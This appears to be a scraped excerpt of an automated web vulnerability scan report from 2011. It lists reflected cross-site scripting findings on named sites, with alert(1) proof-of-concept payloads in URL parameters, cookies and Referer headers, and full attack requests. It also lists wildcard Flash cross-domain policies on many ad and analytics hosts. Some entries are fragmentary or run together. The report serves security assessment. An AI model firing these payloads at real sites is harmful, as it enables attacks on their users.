3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oscommerce-manager.com
Path:
/thank-you-purchasing-magneticone-product
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee884"><script>alert(1)</script>9096c38c85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3183c"><script>alert(1)</script>20375e6ddd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44b2"><script>alert(1)</script>3cf167b5311 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe33"><script>alert(1)</script>b6c282e0484 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee376"><script>alert(1)</script>241027ec1dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.156. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oscommerce-manager.com
Path:
/themes/oscmanager/images/menu-expanded.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b045"><script>alert(1)</script>29d3f4373d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a5"><script>alert(1)</script>784c4fce844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e03d8"><script>alert(1)</script>bdf9f240bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef7d"><script>alert(1)</script>c12fe7265ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e58"><script>alert(1)</script>1331439b8c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.161. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-leaf.gif [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oscommerce-manager.com
Path:
/themes/oscmanager/images/menu-leaf.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 600a9"><script>alert(1)</script>2671288c97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8cd"><script>alert(1)</script>62cd40caa8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79fc"><script>alert(1)</script>e125c6ed553 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193f0"><script>alert(1)</script>93bc7f90304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca2f"><script>alert(1)</script>b92bcd436dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7585b"><script>alert(1)</script>549d6025e2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e62"><script>alert(1)</script>0d05b4aca19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bill_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 31035<script>alert(1)</script>2b5d3cef309 was submitted in the bill_addr.country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bill_addr.state request parameter is copied into the HTML document as plain text between tags. The payload f7cf3<script>alert(1)</script>6fda55ceb90 was submitted in the bill_addr.state parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cc_exp_month request parameter is copied into the HTML document as plain text between tags. The payload e869c<script>alert(1)</script>25983be44dc was submitted in the cc_exp_month parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cc_exp_year request parameter is copied into the HTML document as plain text between tags. The payload e8f2d<script>alert(1)</script>db93a5dd3be was submitted in the cc_exp_year parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the payment_type_def_id request parameter is copied into the HTML document as plain text between tags. The payload 16ef6<script>alert(1)</script>72ff08b81c5 was submitted in the payment_type_def_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ship_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 3889e<script>alert(1)</script>733a0108356 was submitted in the ship_addr.country parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ship_addr.state request parameter is copied into the HTML document as plain text between tags. The payload 6705d<script>alert(1)</script>b68c7b1b8a8 was submitted in the ship_addr.state parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the browid request parameter is copied into the HTML document as plain text between tags. The payload 1e7bc<script>alert(1)</script>0d6eddfe6a6 was submitted in the browid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the livezilla request parameter is copied into the HTML document as plain text between tags. The payload ae77c<script>alert(1)</script>4c049e29410 was submitted in the livezilla parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the start request parameter is copied into the HTML document as plain text between tags. The payload f6044<script>alert(1)</script>ca9b4d96ff2 was submitted in the start parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2298b'><script>alert(1)</script>7b7bb0d95c7 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events.php?bgColor=EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7& HTTP/1.1 Host: www.wiktel.com Proxy-Connection: keep-alive Referer: http://www.wiktel.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wiktel.com
Path:
/events.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5a4a'><script>alert(1)</script>036c8c6f9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events.php?bgColor=EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA& HTTP/1.1 Host: www.wiktel.com Proxy-Connection: keep-alive Referer: http://www.wiktel.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1349'-alert(1)-'4ed7fdc4ff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getsearchbox.cgi HTTP/1.1 Host: www.yourwebsitevalue.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html> <head> <script language="JavaScript" type="text/javascript"> //Gets the browser specific XmlHttpRequest Object function YWVgetXmlHttpRequestObject() { if (window.XMLHttpRequest) {
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f3"-alert(1)-"9bc35301f96 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8c3c"-alert(1)-"57d21297b34 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c3533<script>alert(1)</script>009f5d08c6b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sun, 15 May 2011 13:59:59 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1368
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 5513d<script>alert(1)</script>ff2ec5c09da was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload aff8e<script>alert(1)</script>3048c8f55e5 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 6d280<script>alert(1)</script>864c9da4fc6 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e1a93<script>alert(1)</script>a601e6228df was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e2cc3<script>alert(1)</script>a9b554f8c69 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload b2b5b<script>alert(1)</script>949c83499ab9a5e0e was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 386bc</script><script>alert(1)</script>cd811f435f3 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62653</script><script>alert(1)</script>c7e77554239 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c.gelifesciences.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:55 GMT Server: Omniture DC/2.0.0 xserver: www64 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cfe713.r.axf8.net
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT Accept-Ranges: bytes ETag: "56b3a475ee27cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 15 May 2011 13:16:22 GMT Connection: close Content-Length: 153
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.xp1.ru4.com
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Sun, 15 May 2011 14:07:18 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:31:41 GMT Content-length: 202 Etag: "ca-4ceae13d" Accept-ranges: bytes Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: d1.openx.org
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:58:44 GMT Server: Apache Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT ETag: "4c3a05-c7-48f142a249100" Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: h41174.www4.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:23 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT ETag: "66b4b7-d0-4436057df0e40" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: idcs.interclick.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT Accept-Ranges: bytes ETag: "7b643f1dafecb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Sun, 15 May 2011 13:18:32 GMT Connection: close Content-Length: 225
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: iinet.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:32 GMT Server: Omniture DC/2.0.0 xserver: www297 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: j2global.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:31 GMT Server: Omniture DC/2.0.0 xserver: www63 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: js.revsci.net
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Sun, 15 May 2011 13:19:07 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.extole.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800 Cache-Control: max-age Content-Type: text/xml Date: Sun, 15 May 2011 13:24:35 GMT Expires: Sun, 22 May 2011 13:24:35 GMT Last-Modified: Tue, 15 Feb 2011 18:44:08 GMT Server: nginx/0.7.65 Content-Length: 134 Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: met1.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:17:02 GMT Server: Omniture DC/2.0.0 xserver: www76 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" Server: Microsoft-IIS/7.5 P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", Date: Sun, 15 May 2011 13:16:31 GMT Connection: keep-alive Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: onebox.extole.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sun, 15 May 2011 13:24:17 GMT Last-Modified: Mon, 02 May 2011 03:48:32 GMT Server: nginx/0.7.65 X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5 Content-Length: 131 Connection: Close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.fetchback.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pro.hit.gemius.pl
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: r.turn.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sun, 15 May 2011 13:17:06 GMT Content-Type: text/xml;charset=UTF-8 Date: Sun, 15 May 2011 13:17:05 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia.com
Response
HTTP/1.0 200 OK Server: IM BidManager Date: Sun, 15 May 2011 13:16:29 GMT Content-Type: text/plain Content-Length: 81
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: upc.d2.sc.omtrdc.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:44 GMT Server: Omniture DC/2.0.0 xserver: www26 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.burstnet.com
Response
HTTP/1.0 200 OK Server: Apache (Unix) Last-Modified: Wed, 11 May 2011 17:56:33 GMT ETag: "110080-66-4dcacdd1" Accept-Ranges: bytes Content-Length: 102 Content-Type: text/xml Date: Sun, 15 May 2011 13:18:52 GMT Connection: close Set-Cookie: 56Q8=CT; expires=Sun, 12-Jun-2011 13:18:52 GMT; path=/; domain=.www.burstnet.com P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
